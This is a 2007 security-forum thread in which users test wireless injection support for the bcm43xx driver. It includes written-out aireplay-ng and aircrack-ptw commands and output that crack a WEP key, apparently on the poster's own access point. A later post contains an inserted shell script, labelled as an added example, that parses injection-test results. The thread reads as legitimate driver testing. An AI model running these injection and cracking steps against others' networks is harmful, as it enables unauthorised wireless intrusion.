Remote Exploit Forums

Wireless: Specific topics related to the attack & defense of wireless systems
#1
06-17-2007, 04:01 PM
theprez98
Super Moderator
Join Date: Apr 2007
Location: Maryland
Posts: 2,556

bcm43xx injection support (it works!)

Testing still in progress, but Aireplay attack 9 (injection test) says it's working...
Code:
bt ~ # iwconfig eth0
eth0      IEEE 802.11b/g  ESSID:off/any  Nickname:"Broadcom 4318"
          Mode:Monitor  Frequency=2.437 GHz  Access Point: Invalid
          Bit Rate=1 Mb/s   Tx-Power=18 dBm
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Link Quality=0/100  Signal level=-256 dBm  Noise level=-256 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

bt ~ # ifconfig eth0 up
bt ~ # iwconfig eth0 mode Monitor channel 6
bt ~ # aireplay-ng -9 -e WOPR -a 00:14:BF:1C:CF:E3 eth0
11:59:46  Trying broadcast probe requests...
11:59:47  No Answer...
11:59:47  Found 1 AP

11:59:47  Trying directed probe requests...
11:59:47  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
11:59:53  Ping (min/avg/max): 1.608ms/29.276ms/137.090ms
11:59:53  9/30: 30%

11:59:53  Injection is working!
__________________
theprez98
"I want peace on earth and goodwill toward men."
"We are the United States Government. We don't do that sort of thing!"
#2
06-17-2007, 04:27 PM
theprez98

UPDATE

Injection works with bcm43xx!

Aireplay-ng attacks 1 and 3...

I injected for ~60 seconds and captured ~5400 IVs with airodump.
Code:
bt ~ # aireplay-ng -1 0 -e WOPR -a $AP -h $WIFI eth0
12:24:20  Waiting for beacon frame (BSSID: 00:14:BF:1C:CF:E3)
12:24:20  Sending Authentication Request
12:24:20  Authentication successful
12:24:20  Sending Association Request
12:24:22  Association successful :-)
bt ~ # aireplay-ng -3 -b $AP -h $WIFI eth0
Saving ARP requests in replay_arp-0617-122426.cap
You should also start airodump-ng to capture replies.
12:24:32  Packets per second adjusted to 375nt 1380 packets...(240 pps)
12:24:36  Packets per second adjusted to 282ent 2033 packets...(265 pps)
12:24:43  Packets per second adjusted to 212ent 3225 packets...(262 pps)
12:24:55  Packets per second adjusted to 159ent 5245 packets...(237 pps)
12:25:04  Packets per second adjusted to 120ent 6220 packets...(216 pps)
12:25:10  Packets per second adjusted to 90sent 6599 packets...(205 pps)
12:25:12  Packets per second adjusted to 68sent 6644 packets...(203 pps)
Read 10231 packets (got 3907 ARP requests), sent 7456 packets...(164 pps)
#3
06-17-2007, 05:14 PM
theprez98

The final step was using the ptw attack:

~40,000 packets injected in <5 minutes.

Code:
bt ~ # aircrack-ptw wopr-03.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:14:BF:1C:CF:E3  keyindex=0
stats for bssid 00:14:BF:1C:CF:E3  keyindex=0 packets=39453
Found key with len 13: <<hidden>>
#4
06-17-2007, 05:16 PM
theprez98

The Wiki has been edited to reflect that the bcm43xx patch does in fact support injection.
#5
06-17-2007, 05:36 PM
shamanvirtuel
Senior Member
Join Date: May 2007
Location: In The EX-"Human Rights Country", the land of cheese and wine.....
Posts: 2,981

Test it like this.....
aireplay-ng --test -i rausb0 eth0

rausb0 is another card in monitor mode on the same channel as eth0; it will act as an AP.
eth0 is the card you want to test.

It will output the results of each attack like this:
attack -1 OK
attack -2 OK
attack......

It's card-to-card injection, really useful, but it needs 2 cards in monitor mode on the same channel.

Hope this helps make the test results more accurate.
Last edited by shamanvirtuel; 06-17-2007 at 05:38 PM.
#6
06-17-2007, 05:58 PM
theprez98

Card-to-card injection not working... but as far as I am concerned, from the results above, bcm43xx does in fact support injection.
Code:
bt ~ # aireplay-ng --test -i ath1 eth0
13:55:47  Trying broadcast probe requests...
13:55:48  Injection is working!
13:55:48  Found 1 AP

13:55:48  Trying directed probe requests...
13:55:48  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56  Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56  3/30: 10%


13:55:56  Trying card-to-card injection...
13:55:58  Attack -0:        Failed
13:56:00  Attack -1 (open): Failed
13:56:02  Attack -1 (psk):  Failed
13:56:04  Attack -2/-3/-4:  Failed
13:56:07  Attack -5:        Failed
#7
06-17-2007, 06:11 PM
shamanvirtuel

According to this, yes, but it's strange that the attacks failed... Are the cards on the same channel? It's necessary to initiate card-to-card injection...

But according to what I see in your results... it works.
#8
06-17-2007, 06:14 PM
theprez98

Quote (Originally Posted by shamanvirtuel):
According to this, yes, but it's strange that the attacks failed... Are the cards on the same channel? It's necessary to initiate card-to-card injection...

But according to what I see in your results... it works.
I'll check again when I get home...can't work too hard on Father's Day!!!
Last edited by theprez98; 06-17-2007 at 06:23 PM.
#9
06-17-2007, 10:17 PM
theprez98

I re-initialized both cards in monitor mode, ensuring they were both on the same channel... With the exception of attack 5, the test shows that the bcm43xx driver is not only patched for injection, but works. A manual test of attack 5 also failed.
Code:
bt ~ # aireplay-ng --test -i eth0 ath2
18:14:19  Trying broadcast probe requests...
18:14:19  Injection is working!
18:14:20  Found 1 AP

18:14:20  Trying directed probe requests...
18:14:20  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23  Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23  22/30: 73%


18:14:23  Trying card-to-card injection...
18:14:23  Attack -0:        OK
18:14:23  Attack -1 (open): OK
18:14:23  Attack -1 (psk):  OK
18:14:23  Attack -2/-3/-4:  OK
18:14:25  Attack -5:        Failed
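The injection test output quoted in posts #1, #6 and #9 (`aireplay-ng -9` and `aireplay-ng --test` are the same test) has a small, stable shape, and anyone repeating this check across several cards and drivers wants it reduced to a verdict instead of read by eye. The script below is an added example, not part of this thread or of aircrack-ng: a POSIX shell filter that parses that output from stdin, reports the directed-probe answer rate and which card-to-card attacks failed, and, when the broadcast probe succeeded but every card-to-card attack failed (the pattern in post #6), points at the same-channel requirement shamanvirtuel raised. The two sample inputs are the outputs pasted in posts #6 and #9; the line formats are assumed to be those of the aireplay-ng build used in the thread, and nothing is assumed about the driver or hardware.

```shell
#!/bin/sh
# Added example (not from the thread or aircrack-ng): turn `aireplay-ng -9` /
# `aireplay-ng --test` output into a one-line verdict.
# Usage: aireplay-ng -9 -i ath2 eth0 2>&1 | sh injtest.sh -     (read stdin)
#        sh injtest.sh                                          (run the samples)
# Assumption: line formats match the aireplay-ng output pasted in this thread.

# Sample 1 (post #6): cards NOT on the same channel, every card-to-card attack failed.
SAMPLE_MISMATCH=$(cat <<'EOF'
13:55:47  Trying broadcast probe requests...
13:55:48  Injection is working!
13:55:48  Found 1 AP
13:55:48  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56  Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56  3/30: 10%
13:55:56  Trying card-to-card injection...
13:55:58  Attack -0:        Failed
13:56:00  Attack -1 (open): Failed
13:56:02  Attack -1 (psk):  Failed
13:56:04  Attack -2/-3/-4:  Failed
13:56:07  Attack -5:        Failed
EOF
)

# Sample 2 (post #9): cards re-initialised on the same channel, only -5 failed.
SAMPLE_SAME_CHANNEL=$(cat <<'EOF'
18:14:19  Trying broadcast probe requests...
18:14:19  Injection is working!
18:14:20  Found 1 AP
18:14:20  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23  Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23  22/30: 73%
18:14:23  Trying card-to-card injection...
18:14:23  Attack -0:        OK
18:14:23  Attack -1 (open): OK
18:14:23  Attack -1 (psk):  OK
18:14:23  Attack -2/-3/-4:  OK
18:14:25  Attack -5:        Failed
EOF
)

# 1 if "Injection is working!" appears anywhere (post #1's build prints it last,
# the later runs print it right after the broadcast probes), else 0.
broadcast_ok() {
    if grep -q 'Injection is working!'; then echo 1; else echo 0; fi
}

# Directed-probe answer rate: "22/30: 73%" -> 73. Prints -1 if the line is absent.
directed_pct() {
    awk '$2 ~ /^[0-9]+\/[0-9]+:$/ && $NF ~ /%$/ { p = $NF; sub(/%/, "", p) }
         END { if (p == "") p = -1; print p }'
}

# Number of card-to-card "Attack -N" result lines (0 when -i was not given).
c2c_total() {
    awk '/Attack -/ { n++ } END { print n + 0 }'
}

# Names of the card-to-card attacks that failed, one per line, e.g. "-1 (open)".
c2c_failed() {
    awk '/Attack -/ && $NF == "Failed" {
             name = $0
             sub(/^[0-9:]+ +Attack +/, "", name)   # drop "HH:MM:SS  Attack "
             sub(/:.*$/, "", name)                 # drop ":   Failed"
             print name
         }'
}

# One-line verdict starting with FAIL:, OK: or PARTIAL:
injection_verdict() {
    out=$(cat)
    if [ "$(printf '%s\n' "$out" | broadcast_ok)" != 1 ]; then
        echo "FAIL: no 'Injection is working!' in output"
        return 0
    fi
    pct=$(printf '%s\n' "$out" | directed_pct)
    total=$(printf '%s\n' "$out" | c2c_total)
    nfail=$(printf '%s\n' "$out" | c2c_failed | awk 'END { print NR }')
    failed=$(printf '%s\n' "$out" | c2c_failed | tr '\n' ' ')
    if [ "$total" -eq 0 ]; then
        echo "OK: injection working, directed probes answered ${pct}%, card-to-card not run (no -i)"
    elif [ "$nfail" -eq 0 ]; then
        echo "OK: injection working, directed probes answered ${pct}%, all $total card-to-card attacks OK"
    elif [ "$nfail" -eq "$total" ]; then
        # The AP answers but the second card never does: the post #6 pattern.
        echo "PARTIAL: injection working, but all card-to-card attacks failed (${failed}): check both cards are in monitor mode on the same channel"
    else
        echo "PARTIAL: injection working, directed probes answered ${pct}%, card-to-card failed: ${failed}"
    fi
}

case "${1-}" in
    -) injection_verdict ;;                      # live: read aireplay-ng output on stdin
    *) printf '%s\n' "$SAMPLE_MISMATCH" | injection_verdict
       printf '%s\n' "$SAMPLE_SAME_CHANNEL" | injection_verdict ;;
esac
```

The directed-probe percentage is reported but not used to gate the verdict: the thread shows 30%, 10% and 73% all alongside a working injection path, so it is a signal-quality hint rather than a pass/fail criterion. A plain FAIL here means the card never got a probe answer; PARTIAL with every card-to-card attack failed is worth re-checking the channels before blaming the driver, exactly as post #9 did.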
#10
06-17-2007, 10:21 PM
Barry
Senior Member
Join Date: Feb 2006
Location: Right behind you. Using you as a shield.
Posts: 3,311

SSID is WOPR? That's funny!